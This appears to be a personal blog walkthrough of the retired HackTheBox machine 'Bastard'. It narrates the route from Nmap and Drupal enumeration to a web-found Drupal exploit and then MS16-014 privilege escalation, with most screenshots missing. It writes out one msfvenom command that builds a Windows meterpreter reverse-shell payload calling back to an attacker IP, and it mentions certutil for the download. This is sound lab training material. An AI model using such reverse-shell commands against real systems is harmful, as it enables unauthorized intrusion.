HacktheBox Bastard Walkthrough

    The other day, a friend asked if I was on HacktheBox and I was reminded that I'd been absent for a while.  Apparently, they are cranking out a new box every week which could be good or bad -- I'm not really sure.  While looking for something to write, I thought I'd take on one of their retired boxes and that would solve two "needs" simultaneously.  

    This box was interesting mostly because of the hunt for the exploit to gain a foothold on the system.  From there, it was trial and error as to which technique would work for a particular task.  After that, root was easy.

    First, we kick off with Nmap:





    Right off the bat, we see that we're running Windows / IIS and we're running Drupal. 

    We check out the Drupal site:





    We get the Drupal version:





    We run Droopescan:





    We search through Searchsploit:





    We find a vulnerability in Services with an exploit which does not work.  I tried troubleshooting the issue but no such luck.  I then go hunting the web and I find:





    Let's see if we can get a simple "whoami":





    Excellent! 


    Next, let's check out the architecture:





    We need a reverse shell:

    msfvenom -p windows/x64/meterpreter/reverse_tcp -a x64 --platform windows LHOST=10.10.14.4 LPORT=443 -f exe >> mshell443.exe





    I realize I have a shell with that name and I rename my shell to bastard.exe.

    After some trial and error with downloading the file, certutil proves to be the winner.  

    We move the shell to our victim:





    We check the directory as a sanity check.  I should also point out that I created that directory earlier. 

    We execute our shell:





    With our handler set up:





    We catch the inbound connection:





    We move to Exploit Suggester:





    For some reason, ms16-075 does not work.  I move to ms16-014:





    And... we're root!  


    © 2020 sevenlayers.com